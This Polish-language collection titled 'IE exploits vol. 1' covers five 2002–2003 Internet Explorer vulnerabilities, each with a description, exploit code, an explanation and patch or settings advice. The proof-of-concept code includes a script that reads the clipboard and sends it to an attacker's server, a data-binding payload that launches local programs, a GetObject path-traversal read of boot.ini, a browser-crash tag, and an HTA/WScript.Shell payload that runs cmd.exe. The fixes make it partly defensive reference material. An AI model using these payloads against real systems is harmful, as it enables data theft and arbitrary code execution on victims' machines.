IE exploits vol. 1

Wybrane podatności dotyczą przede wszystkim systemów operacyjnych Microsoft Windows:
- Windows NT 4.0
- Windows 98
- Windows 98 SE
- Windows ME
- Windows 2000
- Windows XP
- Windows 2003

oraz przeglądarek Microsoft Internet Explorer 5.0 i nowszych.

// START VOL. 1

Microsoft Internet Explorer Clipboard Reading Vulnerability

Źródło: [ www ]

Data publikacji: 12 stycznia 2002r

Podatne systemy i przeglądarki:
Microsoft Internet Explorer 5.0
+ Microsoft Windows 98SE
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.5
+ Microsoft Windows ME
Microsoft Internet Explorer 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition 64-bit
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition 64-bit
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
i inne przeglądarki

Opis podatności:

Microsoft Internet Explorer umożliwia stronom WWW dostęp do schowka systemowego komputera. IE posiada zaimplementowany obiekt clipboardData, który pozwala językom skryptowym na modyfikacją danych przechowywanychw schowku systemowym. Właściwości tego obiektu umożliwia wykonywanie operacji odczytu i zapisu zawartości tekstowej schowka systemowego przez skrypt strony klienta. Mechanizm ten może zostać jednak wykorzystany przez napastnika do odczytania wrażliwych informacji takich jak adresy poczty elektronicznej, hasła. Nie jest to bezpośrednia podatność ale może stać się częścią bardziej złożonego ataku co powinno być rozważane jako poważne zagrożenie.

Kod exploita:

<script language="JavaScript">

var i = setInterval("doClip();", 200);

function doClip()
{
var x, y;
if (window.clipboardData==y) //dla Opery
{
sendForm(7, 0, "");
clearinterval(i);
}
else
{
try
{
x = window.clipboardData.getData("Text");
}
catch(e)
{
sendForm(7, 0, ""); clearInterval(i);
}
finally
{
if (!(x==y)) { sendForm(7, 1, x); clearInterval(i);
} } } }
</script>

Opis działania exploita:

Skrypt ten sprawdza zmiany zawartości schowka systemowego poprzez okresowe wywoływanie funkcji getData(?Text?) obiektu clipboardData. Jeśli funkcja ta zwróci niepusty łańcuch tekstowy to znaczy, że została odczytana zawartość schowka. Pobrana ze schowka zawartość tekstowa zostaje przesłana formularzem do skryptu serwera, który to skrypt ma za zadanie wyświetlić ją użytkownikowi. Przeprowadzony atak kończy się sukcesem, gdy dane ze schowka zostaną odczytane i przesłane na serwer napastnika (np. przez przekazanie odczytanej zawartości jako parametru wywołania skryptu CGI). Sposób rozwiązania/naprawy: Uniemożliwienie swobodnego odczytywania przez skrypt strony klienta zawartości schowka można zrealizować przez odpowiednią konfigurację zabezpieczeń przeglądarki. Zmiana opcji ?Zezwól na operacje wklejania przez skrypt? na ?Monituj? lub ?Wyłącz? zmniejsza ryzyko powodzenia takiego ataku.



Executing Arbitrary Commands without Active Scripting or ActiveX

Źródło: [ www ]

Data publikacji: 25. lutego 2002r

Podatne systemy i przeglądarki Microsoft Internet Explorer 5.5+

Sprawdzone na tą podatność:
- IE 5.5 SP2 pod Windows 98, wszystkie poprawki przy wyłączonej Aktywnej zawartości i ActiveX.
- IE5.5 SP2 pod Windows NT4 SP6a, wszystkie poprawki przy wyłączonej Aktywnej zawartości i ActiveX.
- IE6 SP1 pod Windows 2000 SP2, wszystkie poprawki przy wyłączonej Aktywnej zawartości i ActiveX.
- IE6 SP1 pod Windows XP, wszystkie poprawki przy wyłączonej Aktywnej zawartości i ActiveX.

Opis podatności:
Od wersji 4 Microsoft Internet Explorer posiada nową właściwość Data Binding, która umożliwia programistom oddzielenie danych aplikacji od warstwy reprezentacji. Źródła danych (DSO ? Data Sources) obsługiwane przez Data Bindingsmogą być bardzo różne: pliki CSV, HTML, XML i wiele innych. Właściwość ta potrafi wiązać elementy HTML takie jak np. <DIV> <SPAN> z źródłami danych bez stosowania dużej ilości skomplikowanego kodu. W tym przykładzie zastosowano element <object>, który dostarcza dane dla mechanizmu Data Bindingbez konieczności dołączania dodatkowego skryptu.

Kod exploita:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"> <security> <exploit>
<![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object&g  t; ]]>
</exploit> </security> </xml>

Opis działania exploita:

Skrypt ten wykorzystuje XML jako źródło danych (DSO), które jest wiązane z elementem <span>. Wykorzystanie XMLa podnosi skuteczność ataku gdyż skrypt nie korzysta z żadnych dodatkowych zewnętrznych wywołań, które mogłyby zostać powstrzymane. Atak ten kończy się sukcesem, gdy na komputerze ofiary zostanie uruchomiony program calc.exe(popularny kalkulator wchodzący w skład domyślnej instalacji systemu Windows). Powodzenie ataku zależy też od podania właściwej ścieżki dostępu do uruchamianej aplikacji. Wartością parametru codebasemusi być bezwzględna ścieżka dostępu do uruchamianej aplikacji ?podanie błędnej ścieżki spowoduje, iż atak się nie powiedzie. Dlatego ważne jest, aby napastnik przewidział prawdopodobną lokalizację plików, które chce uruchamiać w systemie komputerowym ofiary. Skrypt ten uruchamia z dysku lokalnego ofiary calc.exe (możliwe jest też odpalenie notatnik.exe, explorer.exe). Działanie skryptu jest nieszkodliwe ?nie uszkadza żadnych plików systemowych na komputerze ofiary. Jest to jednak zagrożenie gdyż taki rodzaj ataku może wchodzić w skład bardziej złożonego ataku, np. po wcześniejszym nadpisaniu przez agresora aplikacji kalkulatora możliwe staje się uruchomienie dowolnego kodu na komputerze ofiary, co jest już poważnym zagrożeniem.

Sposób rozwiązania/naprawy:

Ponieważ skrypt działa z uprawnieniami strefy ?Mój Komputer? to zmiana ustawień dla strefy ?Internet? nie pomoże. Uniemożliwienie wykonania ataku można być zrealizowane przez odpowiednie ustawienie zabezpieczeń dla strefy ?Mój Komputer?.


Microsoft Internet Explorer GetObject File Disclosure Vulnerability

Źródło: [ www ]

Data publikacji: 1. stycznia 2002r

Podatne systemy i przeglądarki
+ Microsoft Internet Explorer 5.0
+ Windows 98 SE
+ Microsoft Internet Explorer 5.0.1 SP2
+ Microsoft Internet Explorer 5.5 + Microsoft Windows ME
+ Microsoft Internet Explorer 5.5 SP1
+ Microsoft Internet Explorer 5.5 SP2
+ Microsoft Internet Explorer 6.0
+ Microsoft Windows XP
+ Microsoft Windows Server 2003

Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Napastnik, który stworzy złośliwą stronę WWW zawierającą obiekt popup jest w stanie uruchomić istniejący program na dysku ofiary. Błąd rezyduje w Internet Explorerze, który pozwala napastnikowi na wyświetlanie znanych plików na komputerze ofiary w czasie, gdy użytkownik przegląda specjalnie przygotowaną stronę. Problem występuje, gdy funkcja GetObject()zostaje zastosowana do obiektu ActiveX htmlfile. Jeżeli pierwszym argumentem funkcji GetObject() jest adres zawierający sekwencję znaków ?../? to daje to możliwość uzyskania pełnego dostępu do określanego tym adresem dokumentu. Możliwe jest wyświetlanie w systemie ofiary każdego znanego pliku, ale może prowadzić także do uruchamiania dowolnego złośliwego kodu przez napastnika.

Kod exploita:

<script type="text/javascript">
a=GetObject("http://"+location.host+"/../../../..  /../../boot.ini", htmlfile"); setTimeout("alert(a.body.innerText);",2000);
</script>

Opis działania exploita:

Skrypt ten napisany w JavaScript wykorzystuje błąd funkcji GetObject() do wyświetlenia w przeglądarce ofiary zawartości pliku systemowego boot.ini. Atak kończy się sukcesem, gdy zostanie pokazana zawartość pliku boot.ini znajdującego się na aktualnej partycji systemowej. Powodzenie ataku zależy też od wskazania prawidłowego pliku przez atakującego ? podanie nazwy pliku nie istniejącego w systemie ofiary kończy atak niepowodzeniem.

Sposób rozwiązania/naprawy:
Zainstalowanie poprawek Microsoftu:
+ Microsoft Internet Explorer 5.0.1 SP2: Microsoft Patch q316059_IE 5.01
+ Microsoft Internet Explorer 5.5 SP2: Microsoft Patch q316059_IE 5.5SP2
+ Microsoft Internet Explorer 5.5 SP1: Microsoft Patch q316059_IE 5.5SP1
+ Microsoft Internet Explorer 6.0: Microsoft Patch q316059_IE6


Internet Explorer - <input type crash> (MS03-032)

Źródło: [ www ]

Data publikacji: 21. kwietnia 2003r

Podatne systemy i przeglądarki
+ Microsoft Internet Explorer 5.0
+ Windows 98 SE
+ Microsoft Internet Explorer 5.01
+ Microsoft Internet Explorer 5.5
+ Microsoft Internet Explorer 6

Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Napastnik, który stworzy złośliwą stronę WWW zawierającą podany niżej kod jest w stanie wykonać atak DoS na przeglądarkę ofiary. Podatność ta jest spowodowana błędem w pliku biblioteki Microsoftu shlwapi.dll (Shell Light-Weight Utility Library). Skonstruowanie odpowiednio spreparowanego dokumentu HTML z wykorzystaniem znacznika <input type> może spowodować uniemożliwienie działania aplikacji korzystającej z tego właśnie pliku biblioteki.

Kod exploita:

<html> <form> <input type crash> </form> </html>

Opis działania exploita:

Kod exploita jest napisany tylko przy wykorzystaniu języka HTML. Nie wykonuje on żadnych dodatkowych działań poza wykonaniem ataku DoS na przeglądarkę. Atak kończy się sukcesem, gdy ofiara nie nie może dalej korzystać z Internet Explorera, który kończy swoje działanie z błędem.

Sposób rozwiązania/naprawy:
Zainstalowanie poprawek Microsoftu MS03-032: [ www ]


Internet Explorer Object Data Remote Execution Vulnerability (MS03-032)

Źródło: [ www ]
[ www ]

Data publikacji: 20. sierpnia 2003r

Podatne systemy i przeglądarki
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 6.0 dla Windows Server 2003

Opis podatności:

Podatność ta występuje w przeglądarce Microsoft Internet Explorer, która pozwala napastnikowi na uruchomienie w systemie ofiary wykonywalnego kodu w czasie przeglądania przez nią specjalnie przygotowanej strony WWW. Podatność pochodzi ze znacznika <OBJECT> w języku HTML, który umożliwia umieszczanie kontrolek ActiveX na stronach WWW. Parametr określający lokalizacje danych dla obiektów nie jest sprawdzany pod kątem zawartości złośliwego kodu i dlatego możliwe jest przez atakującego uruchomienie dowolnego kodu wykonywalnego bez powiadamiania lub ostrzeżenie ofiary przez przeglądarkę. Kod exploita:

------------ Żądanie klienta ? plik start.html -----------
<html> <head> <title></title>
<meta http-equiv="content-type" content="text/html; CHARSET=iso-8859-2">
</head> <body> <object data="exploit.php"></object> </body> </html> ----------------------------------------------------------

Odpowiedź serwera ? plik exploit.php
----------------------------------------------------------
<? header("Content-type: application/hta"); ?>
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'&g  t; </object>
<script> wsh.Run("cmd.exe /k"); </script>
</html>
----------------------------------------------------------
Opis działania exploita:

Cały atak wykonywany jest przy użyciu dwóch plików. Pierwszy plik start.html to dokument HTML zawierający żądanie pobrania danych dla obiektu z adresu wskazywanego przez parametr ?data=? (w tym przypadku dane umieszczone są w drugim pliku exploit.php). Po wysłaniu żądania pobrania danych dla obiektu serwer odpowiada odsyłając plik exploit.php. Przeglądarka sprawdzając nagłówek odpowiedzi ?Content-Type? stwierdza, że jest to bezpieczny plik i przetwarza go w środowisku przeglądarki ofiary wykonując zawarty w nim złośliwy kod. Ogólna koncepcja ataku:ofiara wysyła żądanie pobrania bezpiecznego pliku a serwer odsyła niebezpieczny plik zawierający złośliwy kod. Atak kończy się sukcesem, gdy na komputerze ofiary bez ostrzeżenia zostanie uruchomiony program cmd.exe(linia komend). Atak nie zawiera żadnych procedur destruktywnych. Możliwe jest też umieszczenie w pliku odpowiedzi serwera (exploit.php) złośliwego kodu wykonywalnego .exe, który po uruchomieniu go w systemie komputerowym ofiary może umożliwić dalsze prowadzenie ataku.

Sposób rozwiązania/naprawy:

Zainstalowanie poprawek Microsoftu MS03-032:
[ www ]

// STOP VOL.

---